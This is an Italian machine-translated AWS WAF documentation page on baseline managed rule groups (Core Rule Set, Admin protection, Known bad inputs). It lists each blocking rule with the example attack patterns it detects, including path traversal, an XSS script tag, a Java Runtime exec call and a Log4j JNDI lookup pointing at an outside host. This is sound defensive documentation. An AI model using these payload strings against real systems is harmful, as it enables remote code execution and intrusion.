Gruppi di regole di base - AWS WAF, AWS Firewall ManagerAWS Shield Advanced, e direttore AWS Shield della sicurezza di rete

Ti presentiamo una nuova esperienza di console per AWS WAF

Ora puoi utilizzare l'esperienza aggiornata per accedere alle AWS WAF funzionalità da qualsiasi punto della console. Per ulteriori dettagli, consulta Utilizzo dell'esperienza console aggiornata.

Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà.

Gruppi di regole di base

I gruppi di regole gestite di base forniscono una protezione generale contro una vasta gamma di minacce comuni. Scegli uno o più di questi gruppi di regole per stabilire la protezione di base per le risorse.

Gruppo di regole gestito dal Core Rule Set (CRS)

VendorName:AWS, Nome:AWSManagedRulesCommonRuleSet, WCU: 700

Nota

Questa documentazione riguarda la versione statica più recente di questo gruppo di regole gestito. Riportiamo le modifiche alla versione nel registro delle modifiche all'indirizzo. AWS Registro delle modifiche di Managed Rules Per informazioni su altre versioni, usa il comando API. DescribeManagedRuleGroup

Le informazioni che pubblichiamo per le regole nei gruppi di regole AWS Managed Rules hanno lo scopo di fornirti ciò di cui hai bisogno per utilizzare le regole senza fornire ai malintenzionati ciò di cui hanno bisogno per aggirarle.

Se hai bisogno di più informazioni di quelle che trovi qui, contatta il Supporto AWS Centro.

Il gruppo di regole di base (CRS) contiene regole generalmente applicabili alle applicazioni Web. Ciò fornisce protezione contro lo sfruttamento di un'ampia gamma di vulnerabilità, incluse alcune delle vulnerabilità ad alto rischio e più comuni descritte nelle pubblicazioni OWASP come OWASP Top 10. Prendi in considerazione l'utilizzo di questo gruppo di regole per qualsiasi caso d'uso. AWS WAF

Questo gruppo di regole gestito aggiunge etichette alle richieste Web che valuta, che sono disponibili per le regole che seguono questo gruppo di regole nel Protection Pack o nell'ACL Web. AWS WAF registra anche le etichette in base ai CloudWatch parametri di Amazon. Per informazioni generali sulle etichette e sui parametri delle etichette, consulta Etichettatura delle richieste Web e. Metriche e dimensioni delle etichette

Nome regola Descrizione ed etichetta
NoUserAgent_HEADER

Verifica la presenza di richieste prive dell'User-Agentintestazione HTTP.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:NoUserAgent_Header

UserAgent_BadBots_HEADER

Verifica la presenza di valori di User-Agent intestazione comuni che indicano che la richiesta è un bot errato. I modelli di esempio includono nessus e nmap. Per la gestione dei bot, vedi anche. AWS WAF Gruppo di regole Bot Control

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:BadBots_Header

SizeRestrictions_QUERYSTRING

Controlla le stringhe di query URI che superano i 2.048 byte.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString

SizeRestrictions_Cookie_HEADER

Controlla le intestazioni dei cookie che superano i 10.240 byte.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header

SizeRestrictions_BODY

Verifica la presenza di corpi di richiesta di dimensioni superiori a 8 KB (8.192 byte).

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:SizeRestrictions_Body

SizeRestrictions_URIPATH

Controlla i percorsi URI che superano i 1.024 byte.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath

EC2MetaDataSSRF_BODY

Esamina i tentativi di esfiltrare i metadati di EC2 Amazon dal corpo della richiesta.

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body

EC2MetaDataSSRF_COOKIE

Esamina i tentativi di esfiltrare i metadati di EC2 Amazon dal cookie di richiesta.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie

EC2MetaDataSSRF_URIPATH

Esamina i tentativi di esfiltrare i metadati EC2 Amazon dal percorso URI della richiesta.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath

EC2MetaDataSSRF_QUERYARGUMENTS

Esamina i tentativi di esfiltrare i metadati di EC2 Amazon dagli argomenti della query della richiesta.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments

GenericLFI_QUERYARGUMENTS

Controlla la presenza di exploit LFI (Local File Inclusion) negli argomenti della query. Gli esempi includono tentativi di path traversal utilizzando tecniche come ../../.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments

GenericLFI_URIPATH

Controlla la presenza di exploit LFI (Local File Inclusion) nel percorso URI. Gli esempi includono tentativi di path traversal utilizzando tecniche come ../../.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericLFI_URIPath

GenericLFI_BODY

Controlla la presenza di exploit LFI (Local File Inclusion) nel corpo della richiesta. Gli esempi includono tentativi di path traversal utilizzando tecniche come ../../.

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL Web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericLFI_Body

RestrictedExtensions_URIPATH

Controlla le richieste i cui percorsi URI contengono estensioni di file di sistema che non sono sicure da leggere o eseguire. I modelli di esempio includono estensioni quali .log e .ini.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath

RestrictedExtensions_QUERYARGUMENTS

Controlla le richieste i cui argomenti di interrogazione contengono estensioni di file di sistema che non sono sicure da leggere o eseguire. I modelli di esempio includono estensioni quali .log e .ini.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments

GenericRFI_QUERYARGUMENTS

Controlla i valori di tutti i parametri di interrogazione per rilevare eventuali tentativi di sfruttare la tecnologia RFI (Remote File Inclusion) nelle applicazioni Web incorporando indirizzi contenenti URLs . IPv4 Gli esempi includono modelli comehttp://,,https://, e ftp:// ftps://file://, con un'intestazione IPv4 host nel tentativo di exploit.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments

GenericRFI_BODY

Ispeziona il corpo della richiesta per rilevare eventuali tentativi di sfruttare la tecnologia RFI (Remote File Inclusion) nelle applicazioni Web incorporando indirizzi contenenti indirizzi URLs . IPv4 Gli esempi includono modelli comehttp://,,https://, e ftp:// ftps://file://, con un'intestazione IPv4 host nel tentativo di exploit.

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericRFI_Body

GenericRFI_URIPATH

Ispeziona il percorso dell'URI alla ricerca di tentativi di sfruttare l'RFI (Remote File Inclusion) nelle applicazioni Web incorporando indirizzi contenenti URLs . IPv4 Gli esempi includono modelli comehttp://,,https://, e ftp:// ftps://file://, con un'intestazione IPv4 host nel tentativo di exploit.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:GenericRFI_URIPath

CrossSiteScripting_COOKIE

Controlla i valori delle intestazioni dei cookie per individuare i modelli XSS (Common Cross-Site Scripting) utilizzando la funzionalità integrata. AWS WAF Istruzione regola di attacco di Cross-site scripting I modelli di esempio includono script come <script>alert("hello")</script>.

Nota

I dettagli sulla corrispondenza delle regole nei AWS WAF log non sono compilati per la versione 2.0 di questo gruppo di regole.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie

CrossSiteScripting_QUERYARGUMENTS

Controlla i valori degli argomenti di interrogazione per i modelli XSS (Common Cross-Site Scripting) utilizzando la funzionalità integrata. AWS WAF Istruzione regola di attacco di Cross-site scripting I modelli di esempio includono script come <script>alert("hello")</script>.

Nota

I dettagli sulla corrispondenza delle regole nei AWS WAF log non sono compilati per la versione 2.0 di questo gruppo di regole.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments

CrossSiteScripting_BODY

Ispeziona il corpo della richiesta alla ricerca di modelli XSS (Common Cross-Site Scripting) utilizzando la funzionalità integrata. AWS WAF Istruzione regola di attacco di Cross-site scripting I modelli di esempio includono script come <script>alert("hello")</script>.

Nota

I dettagli sulla corrispondenza delle regole nei AWS WAF log non sono compilati per la versione 2.0 di questo gruppo di regole.

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL Web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body

CrossSiteScripting_URIPATH

Controlla il valore del percorso URI per i modelli XSS (Common Cross-Site Scripting) utilizzando la funzionalità integrata. AWS WAF Istruzione regola di attacco di Cross-site scripting I modelli di esempio includono script come <script>alert("hello")</script>.

Nota

I dettagli sulla corrispondenza delle regole nei AWS WAF log non sono compilati per la versione 2.0 di questo gruppo di regole.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

Gruppo di regole gestito per la protezione degli amministratori

VendorName:AWS, Nome:AWSManagedRulesAdminProtectionRuleSet, WCU: 100

Nota

Questa documentazione riguarda la versione statica più recente di questo gruppo di regole gestito. Riportiamo le modifiche alla versione nel registro delle modifiche all'indirizzo. AWS Registro delle modifiche di Managed Rules Per informazioni su altre versioni, usa il comando API. DescribeManagedRuleGroup

Le informazioni che pubblichiamo per le regole nei gruppi di regole AWS Managed Rules hanno lo scopo di fornirti ciò di cui hai bisogno per utilizzare le regole senza fornire ai malintenzionati ciò di cui hanno bisogno per aggirarle.

Se hai bisogno di più informazioni di quelle che trovi qui, contatta il Supporto AWS Centro.

Il gruppo di regole Admin protection contiene regole che consentono di bloccare l'accesso esterno alle pagine amministrative esposte. Ciò potrebbe essere utile se esegui software di terza parte o se desideri ridurre il rischio che un utente malintenzionato ottenga l'accesso amministrativo all'applicazione.

Questo gruppo di regole gestito aggiunge etichette alle richieste Web che valuta, che sono disponibili per le regole che seguono questo gruppo di regole nel Protection Pack o nell'ACL Web. AWS WAF registra anche le etichette in base ai CloudWatch parametri di Amazon. Per informazioni generali sulle etichette e sui parametri delle etichette, consulta Etichettatura delle richieste Web e. Metriche e dimensioni delle etichette

Nome regola Descrizione ed etichetta
AdminProtection_URIPATH

Controlla i percorsi URI che sono generalmente riservati all'amministrazione di un server Web o di un'applicazione. I modelli di esempio includono sqlmanager.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:admin-protection:AdminProtection_URIPath

Input non validi noti: gruppo di regole gestito

VendorName:AWS, Nome:AWSManagedRulesKnownBadInputsRuleSet, WCU: 200

Nota

Questa documentazione riguarda la versione statica più recente di questo gruppo di regole gestito. Riportiamo le modifiche alla versione nel registro delle modifiche all'indirizzo. AWS Registro delle modifiche di Managed Rules Per informazioni su altre versioni, usa il comando API. DescribeManagedRuleGroup

Le informazioni che pubblichiamo per le regole nei gruppi di regole AWS Managed Rules hanno lo scopo di fornirti ciò di cui hai bisogno per utilizzare le regole senza fornire ai malintenzionati ciò di cui hanno bisogno per aggirarle.

Se hai bisogno di più informazioni di quelle che trovi qui, contatta il Supporto AWS Centro.

Il gruppo di regole Known bad inputs contiene regole per bloccare i modelli di richiesta noti per essere non validi e associati allo sfruttamento o all'individuazione di vulnerabilità. Ciò può contribuire a ridurre il rischio che un utente malintenzionato scopra un'applicazione vulnerabile.

Questo gruppo di regole gestito aggiunge etichette alle richieste Web che valuta, che sono disponibili per le regole che seguono questo gruppo di regole nel Protection Pack o nell'ACL Web. AWS WAF registra anche le etichette in base ai CloudWatch parametri di Amazon. Per informazioni generali sulle etichette e sui parametri delle etichette, consulta Etichettatura delle richieste Web e. Metriche e dimensioni delle etichette

Nome regola Descrizione ed etichetta
JavaDeserializationRCE_HEADER

Ispeziona le chiavi e i valori delle intestazioni delle richieste HTTP alla ricerca di modelli che indicano i tentativi di deserializzazione di Java Remote Command Execution (RCE), come le vulnerabilità RCE di Spring Core e Cloud Function (CVE-2022-22963, CVE-2022-22965). I modelli di esempio includono (java.lang.Runtime).getRuntime().exec("whoami").

avvertimento

Questa regola controlla solo i primi 8 KB delle intestazioni di richiesta o le prime 200 intestazioni, a seconda del limite raggiunto per primo, e utilizza Continue l'opzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header

JavaDeserializationRCE_BODY

Ispeziona il corpo della richiesta alla ricerca di modelli che indicano i tentativi di deserializzazione di Java Remote Command Execution (RCE), come le vulnerabilità RCE di Spring Core e Cloud Function (CVE-2022-22963, CVE-2022-22965). I modelli di esempio includono (java.lang.Runtime).getRuntime().exec("whoami").

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL Web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body

JavaDeserializationRCE_URIPATH

Controlla l'URI della richiesta alla ricerca di modelli che indicano i tentativi di deserializzazione di Java Remote Command Execution (RCE), come le vulnerabilità RCE di Spring Core e Cloud Function (CVE-2022-22963, CVE-2022-22965). I modelli di esempio includono (java.lang.Runtime).getRuntime().exec("whoami").

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath

JavaDeserializationRCE_QUERYSTRING

Ispeziona la stringa di query della richiesta alla ricerca di modelli che indicano i tentativi di deserializzazione di Java Remote Command Execution (RCE), come le vulnerabilità RCE di Spring Core e Cloud Function (CVE-2022-22963, CVE-2022-22965). I modelli di esempio includono (java.lang.Runtime).getRuntime().exec("whoami").

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString

Host_localhost_HEADER

Controlla l'intestazione host nella richiesta per i modelli che indicano localhost. I modelli di esempio includono localhost.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header

PROPFIND_METHOD

Controlla il metodo HTTP nella richiesta per PROPFIND, che è un metodo simile a HEAD, ma con l'intenzione aggiuntiva di esfiltrare gli oggetti XML.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Propfind_Method

ExploitablePaths_URIPATH

Controlla il percorso URI per i tentativi di accesso ai percorsi delle applicazioni Web sfruttabili. I modelli di esempio includono percorsi come web-inf.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath

Log4JRCE_HEADER

Ispeziona le chiavi e i valori delle intestazioni di richiesta per verificare la presenza della vulnerabilità Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) e protegge dai tentativi di esecuzione di codice in modalità remota (RCE). I modelli di esempio includono ${jndi:ldap://example.com/}.

avvertimento

Questa regola controlla solo i primi 8 KB delle intestazioni di richiesta o le prime 200 intestazioni, a seconda del limite raggiunto per primo, e utilizza Continue l'opzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header

Log4JRCE_QUERYSTRING

Ispeziona la stringa di query per verificare la presenza della vulnerabilità Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) e protegge dai tentativi di esecuzione del codice remoto (RCE). I modelli di esempio includono ${jndi:ldap://example.com/}.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString

Log4JRCE_BODY

Ispeziona il corpo per verificare la presenza della vulnerabilità Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) e protegge dai tentativi di esecuzione del codice remoto (RCE). I modelli di esempio includono ${jndi:ldap://example.com/}.

avvertimento

Questa regola ispeziona il corpo della richiesta solo fino al limite di dimensione del corpo per il protection pack o l'ACL Web e il tipo di risorsa. Per Application Load Balancer and AWS AppSync, il limite è fissato a 8 KB. Per CloudFront API Gateway, Amazon Cognito, App Runner e Verified Access, il limite predefinito è 16 KB e puoi aumentare il limite fino a 64 KB nel pacchetto di protezione o nella configurazione ACL web. Questa regola utilizza l'Continueopzione per la gestione di contenuti di grandi dimensioni. Per ulteriori informazioni, consulta Componenti di richiesta Web di grandi dimensioni in AWS WAF.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body

Log4JRCE_URIPATH

Ispeziona il percorso URI per verificare la presenza della vulnerabilità Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) e protegge dai tentativi di esecuzione del codice remoto (RCE). I modelli di esempio includono ${jndi:ldap://example.com/}.

Operazione delle regole: Block

Etichetta: awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath